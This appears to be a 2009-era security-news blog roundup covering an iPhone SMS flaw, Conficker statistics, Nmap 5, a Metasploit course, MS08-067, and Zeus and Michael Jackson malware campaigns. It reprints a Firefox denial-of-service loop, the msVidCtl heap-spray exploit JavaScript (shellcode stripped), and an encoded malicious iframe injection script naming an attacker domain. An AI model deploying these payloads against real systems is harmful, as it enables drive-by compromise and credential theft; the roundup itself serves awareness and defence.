Wireless hack,Wifi hack & security

Andy Greenberg, Forbes.com

If you receive a text message on your iPhone any time after Thursday afternoon containing only a single square character, Charlie Miller would suggest you turn the device off. Quickly.

That small cipher will likely be your only warning that someone has taken advantage of a bug that Miller and his fellow cybersecurity researcher Collin Mulliner plan to publicize Thursday at the Black Hat cybersecurity conference in Las Vegas. Using a flaw they’ve found in the iPhone’s handling of text messages, the researchers say they’ll demonstrate how to send a series of mostly invisible SMS bursts that can give a hacker complete power over any of the smart phone’s functions. That includes dialing the phone, visiting Web sites, turning on the device’s camera and microphone and, most importantly, sending more text messages to further propagate a mass-gadget hijacking.

ref :-http://in.news.yahoo.com/240/20090729/1318/ttc-6711345.html

Regards to Rsnake

as he was playing around with Firefox today and accidentally found a super tiny DoS for Firefox that reminded me of my childhood. Remember that math puzzle where you put one penny on one square and then two on the next and four on the next and so on? Clearly that would amount to more money than you could realistically have when you really think through it, but kids have a hard time wrapping their heads around it. This is sort of similar, except it’s not logarithmic, it’s geometric, which was surprising that it caused Firefox so much pain. He had just assumed the JS engine in Firefox would have said that it’s running too tight of a loop and throw the “running too slow” prompt at worst – or just finish at best since it doesn’t look all that complicated:

var a;
for(i=0;i<65536;i++){
document.write(a+=String.fromCharCode(i));
} 

I let this run for 10 minutes on a decent sized test machine and it never finished – I had to kill the process. Yeah, I know there are a million ways to DoS browsers, this one was just surprising

Was Forced to put this in blog as wanted to know the readers, how far the KIDO- aka -Conficker has gone

As in previous months, this malware rating is compiled from data generated by the Kaspersky Security Network (KSN). However, slightly different methods have been used to select and analyze the data.

As before, two Top Twenties have been compiled from the data generated by KSN.

The first Top Twenty lists malicious programs, adware and potentially unwanted programs that were detected and neutralized when accessed for the first time, i.e. by using the on-access scanner. Using on-access statistics makes it possible to analyze the most recent, most dangerous and most widespread malicious programs that were blocked when launched on users’ computers or when downloaded from the Internet.

Even though the way in which threats were analyzed changed, this had no influence on the leaders in this ranking: Net-Worm.Win32.Kido.ih remained in first place. Two more modifications of the worm – Kido.jq and Kido.ix – also appeared in the rating. This Kido crop is due to the fact that this family of malware can also spread in varied ways, including via removable media which are then connected to unprotected computers.

Two worms from the AutoRun family, AutoRun.dui and AutoRun.rxx, also made it into the ranking by dint of the same method.

in detail –> Virus list

Nmap Team is proud to annouce the release of Nmap 5.00, This is the first major release since 4.50 in 2007, and includes about 600 significant changes since then!  They consider this the most important Nmap release since 1997 There are too many changes to list them all in this email, so here are the top 5 improvements in Nmap 5:

1) The new Ncat tool aims to be your Swiss Army Knife for data transfer, redirection, and debugging. We released a whole users’= guide (http://nmap.org/ncat/guide/index.html) detailing security testing and network administration tasks it made easy with Ncat.  Details: http://nmap.org/5/#changes-ncat.

2) The addition of the Ndiff scan comparison tool completes Nmap’s  growth into a whole suite of applications which work together to  serve network administrators and security practitioners.

3) Nmap performance has improved dramatically. We spent last summer scanning much of the Internet and merging that data with internal  enterprise scan logs to determine the most commonly open  ports. This allows Nmap to scan fewer ports by default while  finding more open ports.

4) They released Nmap Network Scanning, the official Nmap guide to network discovery and security scanning. From explaining port  scanning basics for novices to detailing low-level packet crafting  methods used by advanced hackers, this book suits all levels of  security and networking professionals.

5) The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful and flexible features. It allows users to write (and share) simple  scripts to automate a wide variety of networking tasks. Those  scripts are then executed in parallel with the speed and efficiency you expect from Nmap. All existing scripts have been improved, and  32 new ones added. 

To learn about even more changes, see the full release notes here:
http://nmap.org/5/

The Nmap 5.00 source code and Linux, Mac, and Windows packages are
available for download at the usual place:
http://nmap.org/download.html

The Offensive Security Team along with several active community members, have been working diligently to bring you an in depth course on the Metasploit Framework – “Mastering the Framework” . This course will take you on a journey through the  Metasploit Framework in full detail, and will include the latest MSF features such as:

• Advanced Information gathering
• Social Engineering attacks
• Advanced port scanning
• Writing your own MSF plugins
• Auxiliary modules kung fu
• Vulnerability Scanner Integration
• Writing simple MSF fuzzers
• Pivoting, Tunneling
• Exploit Development
• Egghunter mixins
• Mastering MSF Payloads
• Post Exploitation techniques
• Practical Fast Track Usage
• MSF Backdoors
• Advanced AV avoidance
• Much more!

full details here

http://www.offensive-security.com/blog/offsec/metasploit-unleashed-mastering-the-framework/

Fresh 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

please update your AV signatures and keep an eye on IDS / IPS just to minimize the attack vector as early as possible on this exploit as it is likely to be widely deployed with the code being available.

A valid work around for the attack vector is available which set’s the kill bit on the vulnerable DLL.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
“Compatibility Flags”=dword:00000400

Details of the exploit are available on the CSIS web site, but are included below:
var appllaa=’0′;

var nndx=’%'+’u9′+’0′+’9′+’0′+’%u’+'9′+’0′+’9′+appllaa;

[SHELL CODE REMOVED]

var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

while(omybro.length<slackspace)

omybro+=omybro;

bZmybr=omybro.substring(0,slackspace);

shuishiMVP=omybro.substring(0,omybro.length-slackspace);

while(shuishiMVP.length+slackspace<0×30000)

shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;

memory=new Array();

for(x=0;x<300;x++)

memory[x]=shuishiMVP+dashell;

var myObject=document.createElement(’object’);

DivID.appendChild(myObject);

myObject.width=’1′;

myObject.height=’1′;

myObject.data=’./logo.gif’;

myObject.classid=’clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’;

Microsoft have released an advisory for the exploit, it can be found here :
http://www.microsoft.com/technet/security/advisory/972890.mspx

http://www.bing-vs-google.com/
have fun and analyse it ……..

If you have been watching the Microsoft security bulletins lately, then you’ve likely noticed yesterday’s bulletin, MS08-067. This is a particularly nasty bug, as it doesn’t require authentication to exploit in the default configuration for Windows Server 2003 and earlier systems (assuming that an attacker can talk over port 139 or port 445 to your box).

The usual mitigation for this particular vulnerability is to block off TCP/139 (NetBIOS) and TCP/445 (Direct hosted SMB), thus cutting off remote access to the srvsvc pipe, a prerequisite for exploiting the vulnerability in question.

The first stop for gaining more information about the bug in question would be the Microsoft advisory. As usual, however, the bulletin released for the MS08-067 issue was lacking in sufficiently detailed technical information as required to fully understand the flaw in question to the degree necessary down to the level of what functions were patched, aside from the fact that the vulnerability resided somewhere in netapi32.dll (the Microsoft rationale behind this policy is that providing that level of technical detail would simply aid the creation of exploits). However, as Pusscat presented at Blue Hat Fall ‘07, reverse engineering most present-day Microsoft security patches is not particularly insurmountable.
In detail

On Wednesday the 24th of June, 2009 Prevx detected a new Trojan that is harvesting FTP details from compromised machines. The list of compromised machines is vast, we have seen 66,000 unique FTP server logins from unique domains rising to 74,000 by Friday. The list is now so large we have no way to effectively inform companies in a meaningful timeframe.
What is severity of this infection ?

We rate this infection as CRITICAL. The infection has a ‘china syndrome’ potential. It includes a cyclic infection which leverages infected PCs to programmatically modify hi-volume web sites to infect additional users who become part of the cycle. More users leads to more discovery of web site admin credentials which in turn leads to more web sites being modified to serve the infection which leads to more infected users.

What is the infection Vector ?
The malware infects users that visit a compromised website using various exploit kits such as ‘unique pack’. The compromised WebPages contain an injected script that looks something like the example below:
“fr=unescape(’%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e’);var fr=unescape(’%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e’);”

What does the malware do ?

Once installed the malware, which is a variant of the Zeus family, scours the machines stored form cache looking for stored FTP login credentials, then once such logins are found it uses HTTP_POST to send this data to a server located in the Cayman Islands. Additionally, there is another component used, which acts as a script injector. This makes a call to a certain script on the server in the Cayman Islands, using domain goooodbill.cn This script gives the infected client a url in the format USERNAME:PASSWORD@FTP.ADDRESS.COM, the client then logs in to the given ftp site and modifies all index pages (asp,php,html) and injects the script. Once injected all visitors of the modified domain potentially become part of the infection network/cycle.

Even after his Death , they dont leave his name alone and being constanly used to bring in lime light from sneaky people, this time by malaware kiddies, try not to lure in to his death information what the truth might be seen in news channels.

Yes, sadly we’re still talking about people taking advantage of Michael Jackson’s death.

This week, we’ve seen a rise in malware purporting to show images and video leading up to Michael’s death — many malware groups around the world appear to be getting in on the act.

MJ X-Files Web Content

Anyone taking the standard precautions shouldn’t have difficulty avoiding this one — just make sure Javascript is disabled by default (so you don’t get infected by Mal/ObfJS-BP as found in the 1×1 iFrame — it tries to download and run the EXE via an old Acrobat Reader vulnerability), and don’t run the linked EXE manually (everyone knows that clicking on EXEs on a web page is a bad idea, right?) and get infected with Troj/ZBot-GJ.
more